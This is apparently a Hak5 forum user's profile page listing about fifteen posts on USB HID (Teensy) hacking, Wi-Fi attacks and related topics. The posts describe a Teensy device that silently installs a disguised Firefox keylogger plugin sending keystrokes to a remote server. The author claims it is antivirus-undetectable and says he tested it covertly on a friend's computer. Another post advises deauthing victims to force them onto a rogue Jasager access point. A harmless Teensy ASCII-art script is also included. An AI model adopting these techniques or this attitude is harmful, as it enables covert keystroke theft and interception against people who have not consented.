Jump to content

sandred

Active Members
  • Posts

    20
  • Joined

  • Last visited

Recent Profile Visitors

1,935 profile views

sandred's Achievements

Newbie

Newbie (1/14)

  1. Tried this? http://www.hak5.org/forums/index.php?showtopic=16469
  2. I have put them back. Let me know if you have a problem.
  3. If you have a folder C:\kl (may be from previous runs), then you have to delete it before running it again. Try that and try to plug it in with nothing else running on your computer, may be your computer is slow at multitasking and missing some keystrokes.
  4. All the code does it is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry into HKCU (which does not need admin rights) to say to firefox "Hey there is a plugin that you need to load at C:\kl" and when firefox starts it loads the code . Once loaded, the plugin watches all the keystrokes made into browser and quietly posts them to the remote server. The php script is placed in the server, which then takes these keys sent and stores them to a file. You do not need to load these files into teensy. All you need to do is compile the code in Arduino and flash the teensy with it. When you plug in the teensy, it just echos the code to the files and does the rest of that stuff. You can just try it as it is with out changing anything. you can always uninstall it after testing. Yes the keylogger is very simple and very effective and completely undetectable as it is effectively just 2 lines of java script running inside a browser. I already field tested it on one of my friends computer and he does not think any thing ever happened at all when teensy installed it. I had to explain him the details and even after that he does not really believe thats possible. Well educate the masses I guess.
  5. By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof of concept keylogger plugin installation for firefox. When teensy is inserted into usb, it uploads the plugin files into C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into firefox by adding registry key into HKCU\Software\Mozilla\Firefox\Extensions. If firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin(displayed as "Firefox Security Addon") loads when firefox starts the next time. If everything goes fine, it will be done in 10 secs. The keystrokes are then sent to remote server (specified in the code). The remote server then captures the keystrokes, time stamps and ip stamps (Bonus! we get the ip too) the data and logs it. Please keep in mind that this is by no means a polished or optimized code, bugs will exist. So watch out. I quickly copy pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this can not be implemented in a more sophisticated way for other plugin supported browsers and for all OS's. I would love to see somebody optimize it. Download the code from here http://karmetasploit.com/KL/AllFiles.zip if you do not bother to change the server or just want to test it, then the logs are currently stored in this location: http://karmetasploit.com/KL/logger.txt Some plus points with these kind of keyloggers: It works behind what ever firewalls as long as Firefox gets the internet. 100% AV undetectable You can decide to log or not to log based on ip. Why bother stealing cookies when you can get all the key strokes. :)
  6. I was trying to get a feel for system delays and general programming flow when using teensy. So I thought I would just do this for the heck of it, and when I did it..... why not share it . It will make someone happy for sure. Understand the risks if you are planning to run it. Do not run on slow systems. Few things learnt while doing this. Delays are so damm important and they are just varying from system to system. Almost need to think of slowest machines.That brings to my second point. Feed back from the system is critical, we need to figure out how to get some feedback from system. /* .prints the obfuscated ascii heart .gets the heart into recognizable shape .says I love you .beats the heart <-- this may not work on slower machines ***Close all script/text/other programs with text input before running this. This program can be highly destructive if notepad is not launched for some reason. Use it at your own risk.*** */ #include <string.h> int ledPin = 11; int i,j,k; int nBeats = 5; //no of beats int fHigh = 14; // max font size int fLow = 6; //min font size int nSpaces = 20; // times to move the art to right int cn[] ={0,0,0,0,0}; //to store count of each char in the set to be replaced back char *rc[]= {"_"," ","I","Love","You"}; // replaced char set in original ascii art char *rw[] ={"66","99","1","4","3"}; // replaced with this char set to obfuscate it char *line[] = {"999999999999999999#991994999999999999999999999999#99199499", "999999999999#991994993..99999999999999#991994993...#", "99999999#991994993...#99199999999#991994993...#99199", "999999#991994993...#991994993...#9966666666666666#99199", "9999#991994993...#991994993...#99666666666666666666#99199", "99#991994993...#991994993...#99199Lo66666666666666#99199", "99#991994993...#991994993...#99199499Y666666666666#", "#991994993...#991994993...#991994993..6666#991", "#991994993...#991994993...#991994993...#9966#", "#991994993...#991994993...#991994993...#99199", "#991994993...#991994993...#991994993...#99199", "99#991994993...#991994993...#991994993...#99", "9999#991994993...#991994993...#991994993...", "99999999#991994993...#991994993...#991994993", "999999999999#991994993...#991994993...#99199Lov", "999999999999999999#991994993...#991994993...#", "999999999999999999999999#991994993...#99199499Y", "9999999999999999999999999999#991994993...#99199L", "9999999999999999999999999999999999#991994993.", "99999999999999999999999999999999999999#99199499", "999999999999999999999999999999999999999999#99199Lo", "99999999999999999999999999999999999999999999#99199", "9999999999999999999999999999999999999999999999#99"}; // ascii art to be printed void setup(){ pinMode(ledPin, OUTPUT); //set led delay(2000); // not needed } void loop () { delay(2000); //wait until hid is detected digitalWrite(ledPin, HIGH); //turn led on WriteMessage();//main funtion KeyCombo(MODIFIERKEY_CTRL,KEY_END); // just in case if the font change function fails, this will not destroy the printed ascii KeyPress(KEY_ENTER); delay(2000);//let them watch it for couple of seconds for(j=1;j<=nBeats;j++){ // make heart beat by changing font size Beat(); //this will not work on slower machines. } ChFont(10); //set back the font size to default 10 digitalWrite(ledPin, LOW); //tunr led off, we are done delay(50000); // delays the loop } void WriteMessage(){ runcmd("notepad.exe"); //open notepad in cmd line delay(2000); //wait until note pad is open sysMenu(KEY_X); //maximize note pad delay(1000); //wait until the command is finished ChFont(10); //set the font size to default 10 for(i=0;i<sizeof(line)/sizeof(line[0]);i++){ //loop through all lines of art for(j=0;line[i][j] != '\0';j++){ if(line[i][j] == rw[0][0]){cn[0]++;} //count each char to be replaced if(line[i][j] == rw[1][0]){cn[1]++;} if(line[i][j] == rw[2][0]){cn[2]++;} if(line[i][j] == rw[3][0]){cn[3]++;} if(line[i][j] == rw[4][0]){cn[4]++;} Keyboard.print(line[i][j]); //print each char letter by letter delay(20);//this produces something to stare on screen } KeyPress(KEY_ENTER); //new line } for(i=0; i<nSpaces; i++){ //move the whole art to the right, more like to the center of notepad KeyCombo(MODIFIERKEY_CTRL,KEY_HOME); for(j=0;j<sizeof(line)/sizeof(line[0]);j++){ //move one line at a time and loop through all. KeyPress(KEY_SPACE); //delay(50); KeyPress(KEY_DOWN); KeyPress(KEY_HOME); } } for(i=0;i<sizeof(rw)/sizeof(rw[0]);i++){ //replace char one by one KeyCombo(MODIFIERKEY_CTRL,KEY_HOME); KeyCombo(MODIFIERKEY_CTRL,KEY_H); delay(300); sysMenu(KEY_M); delay(300); //these are important delays ClicknMove(-127,127); //moves replace screen to bottom left end and takes it out of way delay(300); //these are important delays to make click work switch(i){ //replace accordingly case 0: Keyboard.print(rw[0]); KeyPress(KEY_TAB); Keyboard.print(rc[0]); for(j=1;j < cn[0]/2 -5;j++){ //replace char by char but go few less KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(100); //delay to stare at the action } break; case 1: Keyboard.print(rw[1]); KeyPress(KEY_TAB); Keyboard.print(rc[1]); for(j=1;j < (cn[1]/2 -5);j++){ KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(30); } break; case 2: Keyboard.print(rw[2]); KeyPress(KEY_TAB); Keyboard.print(rc[2]); for(j=1;j < cn[2] -5;j++){ KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(70); } break; case 3: Keyboard.print(rw[3]); KeyPress(KEY_TAB); Keyboard.print(rc[3]); for(j=1;j < (cn[3] -5);j++){ KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(70); } break; case 4: Keyboard.print(rw[4]); KeyPress(KEY_TAB); Keyboard.print(rc[4]); for(j=1;j < (cn[4] -5);j++){ KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(70); } break; } KeyCombo(MODIFIERKEY_ALT, KEY_A); //replace remaining few with replace all delay(30); // important for above command to be finished. sysMenu(KEY_C); //close replace box. } } void Beat(){ for(i=6;i<=fHigh;i++){//increase font one size at a time ChFont(i); delay(20); } for(k=14;k>=fLow;--k){ //decrease font one size at a time ChFont(k); delay(20); } } void runcmd(char *cmd){ KeyCombo(MODIFIERKEY_GUI,KEY_R); // open run dialog delay(1500); // wait for it to open Keyboard.print(cmd); // enter some command KeyPress(KEY_ENTER); // exec some command } void KeyPress(int SomeKey) { Keyboard.set_key1(SomeKey); // set some key Keyboard.send_now(); // "press" some key // clear some key Keyboard.set_key1(0); Keyboard.send_now(); } void KeyCombo(int ModKey,int SomeKey) { Keyboard.set_modifier(ModKey); //set one or more modifier keys Keyboard.set_key1(SomeKey); // set regular key Keyboard.send_now(); // send strokes // clear keys Keyboard.set_modifier(0); // prep release of control keys Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times. Keyboard.send_now(); } void sysMenu(int SomeKey) { Keyboard.set_modifier(MODIFIERKEY_ALT); //set one or more modifier keys Keyboard.set_key1(KEY_SPACE); // set regular key Keyboard.send_now(); // send strokes // clear keys Keyboard.set_modifier(0); // prep release of control keys Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times. Keyboard.send_now(); delay(10); Keyboard.set_key1(SomeKey); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void ClicknMove(int x, int y){ Mouse.set_buttons(1,0,0); Mouse.move(x, y); Mouse.set_buttons(0,0,0); } void ChFont(int sz){ KeyCombo(MODIFIERKEY_ALT,KEY_O); delay(50); //magic number that works on my machine KeyPress(KEY_F); //open font window delay(50); KeyPress(KEY_TAB);//go to font size KeyPress(KEY_TAB);//go to font size Keyboard.print(sz);//give new size KeyPress(KEY_ENTER); }
  7. Try dns tunneling with heyoka. It theoretically should work with existing open ports and give u RDP or ssh which ever is listening on ur master.
  8. sandred

    Gsm Mitm

    It was very interesting talk at Shmoocon 2010 about GSM MITM and using USRP and OpenBooTS. The only downside of it being the cost. I came across this today and you might already be aware of it from ATT http://www.wired.com/gadgetlab/2010/03/att-microcell/ . I am not sure if that thing is hackable to begin with but they claim "Device is secure – cannot be accessed by unauthorized users, easy and secure online management of device settings" .... hmm sounds challenging and interesting. Any of you looked into it? May be or if we can use this instead of costly USRP module for GSM MITM?
  9. Do not use wicd or wicd-client. If I remember it correctly wicd disconnects you from either one of them as soon as you connect to other. So if you want to test it and still want to use wicd, connect to internet as you normally do using wicd then right click on wicd client icon and completly exit it. Then test if you are still connected to internet. After that bring eth0 up using above commands and u should be fine. I believe if you dont exit wicd before bringing eth0 up it will disconnect u from wlan0. I think but I am not sure. try it.
  10. Here .. This might help you. Post back here if you have any problems as I definitely got that working.
  11. I had a copy of it. I hope it is alpha 4. Here is the link.
  12. I am new to this USB thing..so please bare with me. So here are nice tools developed by DB. I downloaded them, made a iso containing all the tools, including a autorun.inf to launch them all. The thing that I dont understand is that, they are all on a "CD-ROM" drive that cant write data (aka dump) . So launching them is useless if they cant dump. How do you launch them from a writable portion of jump drive. The only thing I can think of is to run a script that in turn launches the files. But how do you know in which drive letter the files really are? Could some one please get me started on "launching files"
  13. Then how can it do both things at same time. You can only multitask(time share) I assume. If so, will it be fast enough? I will be interested to know how you are approaching this.
  14. Best bet to get most of mdk3 and jasager is to run them on seperate fons. run legend/mdk3/aircrack on one fon..use it to deauth ur target client or ap. that forces ur victims to connect to jasager running on second fon automatically. it totally works.
  15. thanks ! i was under the impression that it did not require new installs. now i got it.
×
×
  • Create New...